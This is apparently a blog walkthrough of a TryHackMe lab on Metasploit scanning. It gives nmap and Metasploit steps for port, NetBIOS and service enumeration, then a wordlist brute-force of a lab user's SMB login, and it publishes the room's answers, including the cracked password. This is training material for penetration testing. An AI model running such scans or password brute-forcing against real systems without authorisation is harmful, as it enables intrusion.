Open in app

Sign in

Write

Sign in

Metasploit Exploitation — Scanning | TryHackMe

Iam_Wander
4 min readMay 29, 2023

--

https://tryhackme.com/room/metasploitexploitation

In this box, we are going to use Metasploit modules to scan for open ports on the target system as well as crack password for a user named Penny.

It is worth noting that in this room, you can use either Nmap and Metasploit to answer the first 3 questions. So lets get straight to it.

Question. How many ports are open on the target system?

Using nmap

Lets try to enumerate for open ports using nmap, i will try take you through the process step by step.

root@ nmap ip_address

We have 5 open ports.

Using Metasploit

Lets try enumerate for open ports using Metasploit step bystep.

  1. Connect terminal to metasploit using >msfconsole
  2. List the potential ports with >search portscan
we have different outputs. Obviously option 3 and 5 can be used to enumerate for open ports

3. proceed to use option 5 >use 5

4. it is good practice to show options

in this case, lets use RHOST.

4. set RHOST to your machine ip >set RHOST machine_ip and proceed to >run

Bingo, we have 5 open ports as highlighted in green

Ans: 5 ports

Question. Using the relevant scanner, what NetBIOS name can you see?

using nmap

we can use the nmap command to search for the netbios name

nmap -sV -sC machine_ip

There we have it. ACME IT SUPPORT

using metasploit

Lets begin by searching for netbios by simply

m6> search netbios

option 2 looks viable. We could use it then proceed to show options.

Lets set the RHOST and run it then wait for the netbios request.

There you have it.

Ans: ACME IT SUPPORT

Question. What is running on port 8000?

Using Nmap

nmap -sV -p 8000 machine_ip

We have the version now.

Ans: WebFS 1.21

Using Metasploit

TCP port 8000 is usually used in the web development. so, we need to search for http_version for this.

m6> search http_version
use 0 and then show options

Now lets set the RHOST and later on set the RPORT from 80 to 8000. ’80 was the default port from the show options result’ and run the command.

Ans: webfs/1.21

Question. What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

This challenge is exiting. Here we are required to bruteforce penny’s password.

From the hint, we can see to use Use the smb_login module.

so lets begin by searching for smb_login.

a search of the smb_login is shown above. Proceed to use option 0 and show options to set the necessary parameters

Set the RHOST first and proceed to set the SMB_User = penny

set the PASS_File to /usr/share/wordlists/MetasploitRoom/MetasploitWorldlist.txt

and run it.

There you have it.

penny’s password is leo1234

Ans: Leo1234

Thank you for reading. I hope you learned as much as I. Metasploit is a very powerful tool and it makes our lives a lot easier

Metasploit
Tryhackme Walkthrough
Junior Pentester
Vulnerability Assessment
Metasploit Framework

--

--

Iam_Wander
Iam_Wander

Written by Iam_Wander

72 Followers
61 Following

stay curious

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams